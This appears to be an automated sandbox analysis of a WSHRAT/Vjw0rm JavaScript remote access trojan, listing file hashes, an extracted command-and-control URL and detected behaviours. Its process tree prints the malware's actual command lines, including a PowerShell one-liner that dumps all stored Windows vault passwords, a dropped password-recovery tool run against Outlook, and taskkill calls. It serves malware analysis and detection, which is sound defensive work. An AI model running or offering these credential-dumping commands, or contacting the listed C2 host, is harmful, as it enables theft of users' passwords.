Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    01-11-2022 08:16

General

  • Target

    FCR22001306.js

  • Size

    268KB

  • MD5

    d873c25379f94f8a1803f4c968befaf6

  • SHA1

    13293c020e2eec88e5627a44ec8eafa3b0d0f6ab

  • SHA256

    da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4

  • SHA512

    d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062

  • SSDEEP

    3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i

Malware Config

Extracted

Family

wshrat

C2

http://egodds.longmusic.com:2084

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 24 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 3 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      PID:1360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1460
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      PID:1368
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:868
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook accounts
      PID:2008
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
        PID:1692

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

      Filesize

      373B

      MD5

      70e69155b8080b5db35191ab8426d084

      SHA1

      383deaaee90ce71b28b0a6e22124e77aa1cccf8b

      SHA256

      104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe

      SHA512

      c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

      Filesize

      100KB

      MD5

      54e8ded7b148a13d3363ac7b33f6eb06

      SHA1

      63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

      SHA256

      400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

      SHA512

      bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

      Filesize

      100KB

      MD5

      54e8ded7b148a13d3363ac7b33f6eb06

      SHA1

      63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

      SHA256

      400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

      SHA512

      bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

    • C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

      Filesize

      10KB

      MD5

      18aa18aca1d624556d87fd1c3c8dfc4a

      SHA1

      45509a074cd5f5d11d507a7fe0bcb733f874e90d

      SHA256

      27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036

      SHA512

      80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

    • memory/1168-54-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

      Filesize

      8KB

    • memory/1368-72-0x00000000760E1000-0x00000000760E3000-memory.dmp

      Filesize

      8KB

    • memory/1460-62-0x00000000027D4000-0x00000000027D7000-memory.dmp

      Filesize

      12KB

    • memory/1460-65-0x00000000027DB000-0x00000000027FA000-memory.dmp

      Filesize

      124KB

    • memory/1460-64-0x00000000027D4000-0x00000000027D7000-memory.dmp

      Filesize

      12KB

    • memory/1460-63-0x000000001B720000-0x000000001BA1F000-memory.dmp

      Filesize

      3.0MB

    • memory/1460-61-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1460-60-0x000007FEF3840000-0x000007FEF4263000-memory.dmp

      Filesize

      10.1MB